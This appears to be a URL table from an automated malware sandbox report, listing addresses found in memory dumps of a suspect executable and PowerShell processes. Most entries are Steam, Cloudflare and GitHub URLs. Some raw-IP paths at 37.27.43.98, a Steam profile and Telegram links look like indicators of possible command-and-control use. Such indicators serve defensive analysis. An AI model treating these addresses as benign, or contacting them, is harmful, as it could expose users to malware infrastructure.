168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2178005887.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.14.dr, 76561199804377619[1].htm0.14.drfalse
                                                                                                                high
                                                                                                                https://community.cloudflare.steamstatic.com/public/javascript/applications/community/main.js?v=_92T168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.1837635638.0000000000A3A000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2522942160.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2565990031.0000000000A9A000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2748505795.0000000000493000.00000004.00000001.01000000.00000008.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201799460.0000000000A91000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2178005887.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.14.dr, 76561199804377619[1].htm0.14.drfalse
                                                                                                                  high
                                                                                                                  https://api.P168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A31000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    unknown
                                                                                                                    https://contoso.com/Iconpowershell.exe, 0000000D.00000002.1672248672.0000000005F28000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                      high
                                                                                                                      https://store.steampowered.com/points/shop/168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.1837635638.0000000000A3A000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2522942160.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2565990031.0000000000A9A000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2748505795.0000000000493000.00000004.00000001.01000000.00000008.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201799460.0000000000A91000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2178005887.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.14.dr, 76561199804377619[1].htm0.14.drfalse
                                                                                                                        high
                                                                                                                        https://steamcommunity.com/profiles/76561199168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A31000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                          high
                                                                                                                          https://t.me/y~168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.00000000009CE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                            high
                                                                                                                            https://sketchfab.com168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2565990031.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201799460.0000000000A98000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A45000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A12000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              high
                                                                                                                              https://lv.queniujq.cn168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2565990031.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201799460.0000000000A98000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A45000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A12000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                high
                                                                                                                                https://www.youtube.com/168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2565990031.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201799460.0000000000A98000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A45000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A12000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                  high
                                                                                                                                  https://github.com/Pester/Pesterpowershell.exe, 0000000D.00000002.1655620114.0000000005015000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                    high
URL | Source | Malicious | Reputation
https://store.steampowered.com/privacy_agreement/ | 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.1837635638.0000000000A3A000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2522942160.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2565990031.0000000000A9A000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2748505795.0000000000493000.00000004.00000001.01000000.00000008.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201799460.0000000000A91000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2178005887.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.14.dr, 76561199804377619[1].htm0.14.dr | false | high
https://community.cloudflare.steamstatic.com/public/css/skin_1/header.css?v=EZbG2DEumYDH&l=engli | 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2522942160.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2748505795.0000000000493000.00000004.00000001.01000000.00000008.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2178005887.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.14.dr, 76561199804377619[1].htm0.14.dr | false | high
https://cdn.cloudflare.steamstatic.com/steamcommunity/public/assets/ | 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2565990031.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201799460.0000000000A98000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A45000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A12000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A31000.00000004.00000020.00020000.00000000.sdmp | false | high
https://community.cloudflare.steamstatic.com/public/javascript/modalv2.js?v=zBXEuexVQ0FZ&l=engli | 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2522942160.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2748505795.0000000000493000.00000004.00000001.01000000.00000008.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2178005887.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.14.dr, 76561199804377619[1].htm0.14.dr | false | high
https://community.cloudflare.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png | 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.1837635638.0000000000A3A000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2522942160.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2565990031.0000000000A9A000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2748505795.0000000000493000.00000004.00000001.01000000.00000008.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201799460.0000000000A91000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2178005887.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.14.dr, 76561199804377619[1].htm0.14.dr | false | high
http://crl.micro | powershell.exe, 00000005.00000002.1563697900.00000000086C2000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1610889169.000000000780F000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1703471346.0000000006ED0000.00000004.00000020.00020000.00000000.sdmp | false | high
https://raw.githubusercontent.com | YYjRtxS70h.exe, 00000000.00000002.1791353691.0000000002A78000.00000004.00000800.00020000.00000000.sdmp | false | high
https://steamcommunity.com/profiles/76561199804377619_ | 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A41000.00000004.00000020.00020000.00000000.sdmp | false | high
https://community.cloudflare.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016 | 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.1837635638.0000000000A3A000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2522942160.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2565990031.0000000000A9A000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2748505795.0000000000493000.00000004.00000001.01000000.00000008.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201799460.0000000000A91000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2178005887.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.14.dr, 76561199804377619[1].htm0.14.dr | false | high
https://37.27.43.98/r | 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A31000.00000004.00000020.00020000.00000000.sdmp | false | unknown
https://37.27.43.98/s | 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A41000.00000004.00000020.00020000.00000000.sdmp | false | unknown
http://schemas.xmlsoap.org/wsdl/ | powershell.exe, 00000005.00000002.1555257254.0000000005177000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1596759724.00000000052A6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1655620114.0000000005015000.00000004.00000800.00020000.00000000.sdmp | false | high
https://www.google.com/recaptcha/ | 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A12000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A31000.00000004.00000020.00020000.00000000.sdmp | false | high
https://checkout.steampowered.com/ | 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A12000.00000004.00000020.00020000.00000000.sdmp | false | high
http://raw.githubusercontent.com | YYjRtxS70h.exe, 00000000.00000002.1791353691.0000000002A92000.00000004.00000800.00020000.00000000.sdmp | false | high
https://37.27.43.98/v | 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2522942160.0000000000A45000.00000004.00000020.00020000.00000000.sdmp | false | unknown
http://www.microsoft.coU | powershell.exe, 0000000A.00000002.1610889169.000000000780F000.00000004.00000020.00020000.00000000.sdmp | false | unknown
https://community.cloudflare.steamstatic.com/public/css/applications/community/main.css?v=LjouqOsWbS | 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2748505795.0000000000493000.00000004.00000001.01000000.00000008.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201799460.0000000000A91000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2178005887.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.14.dr, 76561199804377619[1].htm0.14.dr | false | high
https://community.cloudflare.steamstatic.com/public/javascript/applications/community/libraries~b28b | 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.1837635638.0000000000A3A000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2522942160.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2565990031.0000000000A9A000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2748505795.0000000000493000.00000004.00000001.01000000.00000008.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201799460.0000000000A91000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2178005887.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.14.dr, 76561199804377619[1].htm0.14.dr | false | high
https://steamcommunity.com/profiles/76561199804377619i | 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A41000.00000004.00000020.00020000.00000000.sdmp | false | high
https://community.cloudflare.steamstatic.com/public/javascript/reportedcontent.js?v=-lZqrarogJr8&amp | 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2522942160.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2748505795.0000000000493000.00000004.00000001.01000000.00000008.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2178005887.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.14.dr, 76561199804377619[1].htm0.14.dr | false | high
https://community.cloudflare.steamstatic.com/public/shared/images/responsive/header_logo.png | 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.1837635638.0000000000A3A000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2522942160.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2565990031.0000000000A9A000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2748505795.0000000000493000.00000004.00000001.01000000.00000008.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201799460.0000000000A91000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2178005887.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.14.dr, 76561199804377619[1].htm0.14.dr | false | high
https://store.steampowered.com/; | 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A12000.00000004.00000020.00020000.00000000.sdmp | false | high
https://store.steampowered.com/about/ | 76561199804377619[1].htm0.14.dr | false | high
https://community.cloudflare.steamstatic.com/ | 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A12000.00000004.00000020.00020000.00000000.sdmp | false | high
https://community.cloudflare.steamstatic.com/public/javascript/reportedc | 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2748505795.0000000000493000.00000004.00000001.01000000.00000008.sdmp | false | high
https://steamcommunity.com/my/wishlist/ | 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.1837635638.0000000000A3A000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2522942160.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2565990031.0000000000A9A000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2748505795.0000000000493000.00000004.00000001.01000000.00000008.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201799460.0000000000A91000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2178005887.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.14.dr, 76561199804377619[1].htm0.14.dr | false | high
https://t.me/ | 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2178005887.0000000000A47000.00000004.00000020.00020000.00000000.sdmp | false | high
https://community.cloudflare.steamstatic.com/public/shared/css/motiva_sans.css?v=nc69vwog8R9p&l= | 76561199804377619[1].htm0.14.dr | false | high
https://store.steampowered.com/;) | 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2565990031.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp | false | high
https://store.steampowered.com/;a( | 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.1837734458.0000000000A78000.00000004.00000020.00020000.00000000.sdmp | false | high
https://web.telegram.org | 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2178005887.0000000000A78000.00000004.00000020.00020000.00000000.sdmp | false | high
https://github.com | YYjRtxS70h.exe, 00000000.00000002.1791353691.0000000002A46000.00000004.00000800.00020000.00000000.sdmp | false | high
https://community.cloudflare.steamstatic.com/public/css/promo/summer2017/stickers.css?v=INiZALwvDIbb | 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2522942160.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2748505795.0000000000493000.00000004.00000001.01000000.00000008.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2178005887.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.14.dr, 76561199804377619[1].htm0.14.dr | false | high
